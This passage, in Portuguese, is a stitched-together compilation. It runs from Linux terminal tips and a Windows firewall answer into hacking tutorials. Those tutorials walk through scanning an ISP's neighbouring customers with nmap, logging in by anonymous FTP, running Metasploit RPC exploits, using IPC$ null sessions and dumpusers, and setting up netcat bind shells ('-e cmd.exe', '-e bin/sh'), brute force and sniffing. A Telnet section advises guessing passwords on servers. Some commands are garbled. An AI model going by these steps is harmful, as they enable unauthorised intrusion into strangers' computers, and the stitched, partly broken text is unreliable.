ade opcional, ele ativa o modo verbose, onde ele lista na tela os arquivos extraíd
os e para onde foram.
Se você tivesse em mãos um arquivo .tar.bz2 (que usa o bzip2, um formato de compactação
diferente do gzip), mudaria a primeira letra dos parâmetros, que passaria a ser "j
", indicando o formato, como em:
$ tar -jxvf arquivo.tar.bz2
O tar permite também compactar arquivos e pastas diretamente através do terminal. Ne
sse caso, trocamos a opção "x" (extract) por "c" (create) e passamos a indicar o arq
uivo que será criado e a pasta ou arquivo que será comprimido, como em:
$ tar -zcvf backup.tar.gz /var/www/gdhpress
Nesse exemplo, criamos o arquivo "backup.tar.gz" incluindo o conteúdo da pasta esp
ecificada. O formato do arquivo não é indicado pela extensão, mas sim pelo parâmetro "z"
incluído no comando.
Se você preferir compactar a pasta usando o bzip2, que é mais demorado, mas em compe
nsação resulta em arquivos menores, pode substituir o "z" por "j", como em:
$ tar -jcvf backup.tar.gz /var/www/gdhpress
Histórico: O terminal mantém um histórico dos últimos 500 comandos digitados, que é salvo
automaticamente no arquivo ".bash_history", dentro do diretório home.
Para repetir um comando recente, simplesmente pressione as setas para cima ou pa
ra baixo até encontrá-lo. Para exibir a lista dos comandos anteriores, use o comando
"history", como em:
# history
1 joe /etc/init.d/firewall
2 echo 1 > /proc/sys/net/ipv4/tcp_syncookies
3 apt-get install postfix
4 joe /etc/postfix/main.cf
5 tail -n 30 /var/log/apache2/access.log
Como você pode ver, os comandos são numerados, de acordo com a ordem em que foram di
gitados. Inicialmente a lista será pequena, mas com o tempo ela acumulará várias dezen
as de comandos. Um recurso interessante é a possibilidade de re-executar qualquer
comando da lista chamando-o pelo número, basta usar uma exclamação seguida pelo número c
om o qual o comando aparece na lista (sem espaço, como em "!23" ou "!4"). Se quise
sse executar novamente o comando "echo 1 > /proc/sys/net/ipv4/tcp_syncookies" qu
e aparece como número 2 da lista, por exemplo, usaria:
# !2
Como pode ver, o histórico é uma ferramenta bastante útil para lembrar e executar rapi
damente comandos muito longos, ou comandos que você executa com freqüência. Você pode ta
mbém fazer buscas usando o pipe e o grep como em "history | grep cp" (que mostra t
odas as entradas onde foi usado o comando cp) ou "history | grep apt-get" (que m
ostra todos os comandos onde foi usado o apt-get).
Ponto e vírgula: Você também pode executar uma fila de comandos de uma vez. Basta sepa
rá-los por ponto e vírgula, como em "ls; pwd" ou "cd /mnt/arquivos; ls".
O ponto e vírgula permite também que você agrupe diversos comandos, de forma que eles
sejam executados em ordem. Se você precisa baixar 3 arquivos ISOs, por exemplo, vo
cê pode agrupar 3 comandos do wget, cada um com um dos arquivos em uma única linha,
separados por ponto e vírgula, como em:
$ wget -c http://url/cd1.iso; wget http://url/cd2.iso; wget http://url/cd3.iso
Com isso, os 3 arquivos são baixados seqüencialmente, sem necessidade de intervenção.
Case Sensitive: Salvo poucas exceções, todos os comandos e parâmetros dentro de arquiv
os de configuração são case-sensitive, ou seja, precisam ser digitados literalmente, r
espeitando as maiúsculas e minúsculas.
Na maioria dos casos, tantos os comandos quanto os parâmetros suportados por eles
utilizam letras minúsculas, mas existem exceções, como no caso do comando "MySecureShe
ll" (um shell alternativo para download de arquivos), que precisa ser digitado a
ssim mesmo, com o M e os dois S maiúsculos. Existem ainda muitos casos de comandos
que suportam parâmetros com letras maiúsculas e minúsculas, com resultados diferentes
.
O comando "ls -s", por exemplo, mostra o tamanho dos arquivos na listagem, enqua
nto o "ls -S" mostra os arquivos organizados por tamanho (o maior primeiro). Exi
ste um número grande demais de exemplos para citar aqui, o importante é ter em mente
que eles existem.
reboot: Reinicia o sistema. Faz par com o halt, que faz o desligamento completo.
De uma forma geral, você nunca deve usar o comando "halt" em um servidor remoto,
pelo simples fato de que você precisará de alguém no local para ligá-lo novamente depois
. Nos poucos casos em que é realmente necessário reiniciar o sistema (como ao atuali
zar o kernel), use sempre o reboot.
shutdown: Também serve para desligar ou reiniciar o sistema, mas permite que você es
pecifique um horário. É bastante útil no caso dos servidores, pois permite que você agen
de os reboots do sistema, fazendo-os em horários de baixa demanda.
Especifique um tempo em minutos que o sistema esperará antes de desligar, usando o
parâmetro "+" como em shutdown -r +60. Você pode ainda especificar um horário, no for
mato hh:mm como em shutdown -r +06:00 (para desligar às 6:00 da manhã). Substitua o
"-r" por "-h" se quiser desligar o sistema em vez de reiniciar.
Atalhos : Finalizando esta seção de dicas iniciais, aqui vai uma pequena lista de at
alhos úteis:
Ctrl+L : Limpa a tela, atalho para o comando "clear". Ao usar bastante o termina
l, você acaba se acostumando a usá-lo bastante.
Ctrl+C : Este é um dos atalhos mais usados no terminal, ele serve para terminar a
execução de qualquer comando. Se você digitou um "tar -zcvf arquivos.tar.gz /mnt/arqui
vos" e quer abortar o backup para fazê-lo em outra hora, ou se algum programa bloq
ueou o teclado e você quer finalizá-lo na marra, o Ctrl+C é a solução.
CTRL+L : Atalho para o comando logout, que encerra a sessão atual. Se você usou o co
mando "su -" para virar root, o Ctrl+L vai fazê-lo voltar ao prompt inicial. Press
ionando Ctrl+L mais uma vez, você faz logout, fechando o terminal.
Ctrl+Alt+Del: Na maioria das distribuições, o Ctrl+Alt+Del é um atalho para o comando
"reboot", que reinicia o sistema. Entretanto, ele só funciona se usado em um dos t
erminais de texto puro. Se usado dentro do modo gráfico, o atalho é lido gerenciador
, que provavelmente mostrará a opção de fazer logout.

como liberar portas no firewal do windows 7.__para o progama utorrent!!!


Não sei quais portas o uTorrent utiliza, mas vou informar como fazer para liberar
portas no firewall do Windows para qualquer programa, basta você saber quais porta
s precisa liberar.
Para fazer isso acesse "Painel de Controle", "Sistema e Segurança", "Firewall do W
indows". Clique então em "Configurações avançadas". Agora clique no canto superior direi
to da janela em "Nova Regra". Em "que tipo de regra você deseja criar?" selecione
"Porta" e clique em "Avançar". Escolha na sequência qual o protocolo de transporte u
tilizado pelo programa em questão (TCP ou UDP), assinale também a caixa "Portas loca
is específicas" e coloque a porta desejada. Na próxima tela, selecione "Permitir a c
onexão". Depois em "Quando a regra se aplica" selecione as 3 opções disponíveis e avance
. Por final, digite um nome para a regra e clique em "Concluir".
Pronto, uma nova regra de entrada já foi criada e está em funcionamento.
Dica: Se não tiver experiência ou conhecimento sobre a tecnologia de Firewall, você po
de simplesmente liberar o "programa" que desejar para todo tipo de conexão. Isso é f
eito de forma muito mais simples que o procedimento acima. Para tal basta apenas
acessar "Painel de Controle", "Sistema e Segurança", "Firewall do Windows", clica
r em "Permitir um programa ou recurso pelo Firewall do Windows". Em seguida cliq
ue em "Permitir outro programa" e selecione o programa que desejar, no seu caso
o uTorrent e assinale a liberação do mesmo para os 3 tipos de redes disponíveis (domínio
, doméstica/corporativa e público).
IMPORTANTE: Se utilizar algum roteador ou modem roteado, será necessário efetuar o p
ort forward (redirecionamento/encaminhamento de portas), ou então colocar seu comp
utador na DMZ. Do contrário continuará sem conseguir utilizar este tipo de programas
da maneira desejada

Invasao pelas portas 21,23,135,445


Um conselho para todos vocês que sabem invadir ou estão aprendendo: VOCE NÃO PRECISA F
ALAR PARA NINGUEM QUE VOCE SABE INVADIR, POIS QUANDO SURGIR A NECESSIDADE, VOCE
SURPREENDERÁ OUTRAS PESSOAS!
Um tutorial bem simples e obsoleto que é ainda muito usado nos dias de hoje (por l
ammers).
Invasão pelas portas:
21: FTP
23: TELNET
135: RPC
445: COMPARTILHAMENTO
Estes ataques precisam ter pessoas do mesmo provedor que você.
Vamos começar:
Pegue o seu ip externo(sugestão: www.meuip.com.br).
Baixe o nmap e instale no seu pc.
Vamos supor que o seu ip seja: 201.33.22.18.
Entre no prompt comando do Windows e digite nmap. Aparecerá um montão de opções e ajudas
para você aprende a utilizar.
Prosseguindo
Iremos fazer scanner de portas nos computadores da sua redondeza que tem o mesmo
provedor que você.
digite:
nmap -sV -T Insane -A -v 201.33.22.1-254 -p21,23,135,44
Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga
ou do seu bairro, estado etc depende da sua banda.
Código:
Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164
Invasao pela porta 21
vamos lá ira aparecer um tanto de computadores que tem a porta 21 aberta. Todos aqu
eles que tiverem a mesma aberta. Voce pode tentar logar como anonymous, pois alg
uns administradores ou pessoas nao si preocupam em retirar o usuario anonymous d
o ftp.
Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonymous>a
Invasao pela porta 23
Iniciar>Executar>cmd>telnet>open>201.33.22 23
Invasao pela porta 135
CASO a porta 135 aberta, podemos usar o METASPLOIT
abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.
depois disso escolha o tipo de conexao como: GERENIC\SHELL_BLIND_TCP ou voce que
sabe o tipo de conexao a ser usada.
depois disso matenha as informaçoes padroes do metasploit só inclua o ip da vitima,
pois so o Windows dele nao for atualizado, ele ja vem como shell. Essa invasão rpc
dcom já ficou obsoleta também.
Invasao pela porta 445
Esta porta é de compartilhamento.
Iniciar>Executar>cmd>net use \\201.45.241.175\ipc$ /u: "
Comando concluído com êxito.
baixa o Dumpusers
ponha ele no C:\
abra o cmd digite;
dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose
depois você vai no:
iniciar>executar>\\201.45.241.175\c$
Gente esse tipo de invasão é uma das mais ridículas. Aconcelho a nao fazerem isso.
Fonte: invasão.com.br
NETGAT
Olá meu nome é Rodrigo, hoje falarei sobre o NetCat que é considerado pelos hackers o
canivete suíço do TCP/IP, devido a sua incrível versatilidade, com o NC(NetCat), podem
os fazer um scanner de portas, um trojan, um brute force, entre outras coisas.
Vamos dar uma olhada nos comandos do netcat, a opção -H exibe as opções do programa. Bas
ta digitar nc -h e dar enter.
Veremos os principais comandos do netcat:
l = Coloca uma porta em estado de listenning(escuta)
L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche
P = Define uma porta
V = ativa o recebimento de eco
U = utiliza o protocolo UDP ao invés de TCP
T = para se conectar a TELNET
O = Gera um log em formato hexadecimal
W = Determina um tempo máximo para aguardar uma reposta
E = Redireciona arquivos
D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.
Bem, agora que já conhecemos os comandos mais usados do netcat vamos a pratica:
Colocando uma porta em escuta:

Nc -l -p 8080 isso faria com que o netcat colocasse a porta 8080 em escuta, note
que foi usado -v para que fosse mostrado a saída do programa na tela "listening o
n [any] 8080 ...", caso a opção -v não fosse inserida este texto não seria mostrado.
Fazendo um Port-Scanner com o netcat

nc -vv 127.0.0.1 1-6550 isso faz um scanner da porta 1 à 6550 mais você também pode se
lecionar as portas que deseja escanear dando um espaço entre os intervalos de port
as a ser escaneados ex: nc -vv 127.0.0.1 21 80 23 79 25 isso faria um scanner na
s portas 80, 23, 79 e 25.
Fazendo um trojan com o netcat
Note que basta redirecionar todo o trafego de uma porta enviando a cmd.exe se fo
r windows e bin/bash.sh se for UNIX a sintaxe é a seguinte em sistemas windows nc
-L -p 1024 -e cmd.exe e nc -l -p 1024 -e bin/sh em UNIX.
Fazendo um ataque de brute force com o netcat
O canivete suíço do TCP/IP tem muitas funções interessante uma delas é o brute force um ex
emplo: nc -vv 79 < c:\usuarios.txt > c:\log.txt note que você precisara de um arqu
ivos com nome de usuários em c: e todo log será gravado em c:\log.txt para que você po
ssa analisar depois. esse força bruta foi feita em cima da porta 79 FINGER mais po
deria ser facilmente adaptada a outras portas.
Fazendo um sniffer com o netcat
O fantástico netcat também pode servir como um sniffer e captura todo trafego em uma
rede basta colocar nc -vv -L 127.0.0.1 -p 80 note que o L deve ser maiúsculo pois
, esta opção reabre socketes fechados, isso fará com que o netcat capture todo trafego
na porta 80 acho que nem é mais necessário dizer que podemos também gravar toda saída e
m um arquivo TXT, mais bem pra você que ainda não sacou a jogada ai vai nc -vv -L 12
7.0.0.1 -p 80 > c:\sniffer.txt
Conclusão
Como podemos ver o NETCAT é uma faca de dois gumes é pode ser usado pelos dois lados
da força, este artigo mostrou em detalhes as principais utilidades do netcat mais
vale frisar que não são as únicas utilidades, e com um pouco de imaginação podemos fazer
verdadeiras façanhas com este verdadeiro canivete suíço ...
Aqui termina minha matéria sobre o canivete suíço do TCP/IP o netcat, espero que você te
nha gostado.
TELNET
Pra vc que não sabe o, o TelNet é um progama usado para estabelecer uma conexão entre
computadores. O TelNet é parecido com as telas de um BBS de interface DOS. O TelNe
t funciona com comandos Unix ou apartir de um menu de comandos disponíveis em algu
m lugar da tela. O TelNet pode ser usado para pesquisas e transferências de arquiv
os embora algumas pessoas o utilizem para invasão.
OBS: Este texto tem a intenção de ser educativo, e traser algumas dicas para este gr
ande progama que é o TelNet. Se vc utilizar este conhecimento para o mal, a ação é sua.
Não me responsabilizo por qualquer dano que vc venha a causar, ou qualquer confusão
que venha para o seu lado! UTILIZANDO O TELNET
Primeiro pegue o endereço que vc quer visitar. Se o endereço a ser visitado pedir o
login, vc precisará da senha. Caso vc não saiba a senha ou esqueceu, vc pode chutar.
Se o servidor for de acesso público, vc poderá ficar chutando até acertar. Se o servi
dor for de acesso restrito, vc não poderá chutar, pois se vc errar podem pegar seu I
P, e entregar vc ao seu provedor e vc se foderia.
Se vc for chutar a senha do servidor de acesso público, vc pode tentar com o nome
da organização. Por exemplo, se o endereço for: ned.ipac.caltech.edu (centro de pesqui
sas extragaláticas da Nasa), vc pode tentar a senha ned, ou ipac, ou caltech. É só usa
r a criatividade! Se tudo falhar, vc pode tentar a senha guest, que é usada na mai
oria dos casos que não obedecem a regra citada acima.
Ja se o servidor for de acessso restrito, vai ser um pouco mais complicado. Vc t
era de usar o login de alguem que tenha senha neste provedor. Se for o seu, vc p
ode por a sua senha e seu username. Mas eu não aconselho vc a fazer iso. É que quand
o vc invade um servidor de acesso restrito, vai ficar um arquivo no serivdor. Ne
sse arquivo vai tar a senha e o username do animal que invadiu. Se lá tiver a sua
senha e o seu username, eu nem preciso dizer o que vai acontecer. Tem vários outro
s jeitos de invadir sem utilizar senha, ou sem utilizar a sua senha (senhade out
re pessoa). Mas isto envolveria progamas que não tem nada a ver com Telnet. Então va
mos deixar essa parte de lado. COMANDOS UNIX BÁSICOS PARA O TELNET ls -l: lista os
arquivos de um diretório. Parâmetros principais: t, a, F, R,l ls -al: lista todos o
s arquivos de um diretório, mesmo os ocultos cp 1 2: copia o arquivo do diretório 1
para o diretório 2 (o caminho de diretório deve ser colocado por inteiro) mv 1 2: mo
ve o arquivo do diretório 1 para o diretório 2 (o caminho de diretório deve ser coloca
do por inteiro) rm: deleta arquivo cd: muda o diretório cd: muda o diretório ativo p
ara o que está 'acima' do atual mkdir: cria o diretório dentro do diretório atual rm:
remove o diretório. Parâmetros principais: r, i cat: mostra o conteúdo do arkivo pwd:
exibe o diretório atual clear: limpa a tela Find: procura arquivo. Parâmetros rpinci
pais: name, group, user LINKS PARA LNET

<PIXTEL_MMI_EBOOK_2005>1</PIXTEL_MMI_EBOOK_2005>

S-ar putea să vă placă și